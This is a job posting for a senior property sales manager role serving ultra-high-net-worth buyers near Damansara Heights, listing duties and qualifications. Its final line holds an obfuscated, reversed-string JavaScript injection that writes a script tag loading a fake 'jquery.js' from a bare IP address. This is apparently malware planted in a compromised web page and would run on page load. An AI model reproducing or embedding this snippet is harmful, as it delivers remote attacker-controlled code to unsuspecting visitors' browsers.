Industry : Property Development
– To champion the product brand and represent it to the highest professional standards to a target market of ultra-high net worth individuals.
– To support the appointed Agents by accompanying them when they introduce the product to Prospects in the Marketing Gallery and Show Apartment (MGSA).
– To ensure that the appointed Agents keep to the sales procedure set by SPB when presenting the product to Prospects.
– To accompany Prospects during their visits to the MGSA, advising them on the suitability and value of the unit they are intending to purchase.
– To work closely with appointed Agents to ensure a positive working relationship and maximise the impact and effectiveness of sales strategies.
– To ensure that the MGSA is maintained to the highest standards of functionality and presentation.
– To conduct ‘product knowledge’ training programs for representatives of appointed Agents.
– To pursue sales opportunities independently through direct or third party agency introductions
– To participate in sales campaigns, promotions & events.
– To propose and pursue strategies to build leads, expand into new territories and establish new channels.
– To conduct competitor analysis to monitor upcoming projects and activities in the market as well as keeping up to-date with current market trends in an around Damansara Heights.
– A Diploma, Bachelor Degree, Post-Graduate Diploma or Professional Degree in Marketing, Business Studies or other relevant field of study.
– Minimum 10 years relevant experience in sales in the property development industry at a Managerial position. A successful background in sales with proven track record is a must.
– Excellent selling skills, presentation skills, communication and interpersonal skills.
– An outgoing, proactive and energetic personality.
– A team player.
– Ready to work during the week-ends and public holidays.
– Take pride in their grooming and presentation. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))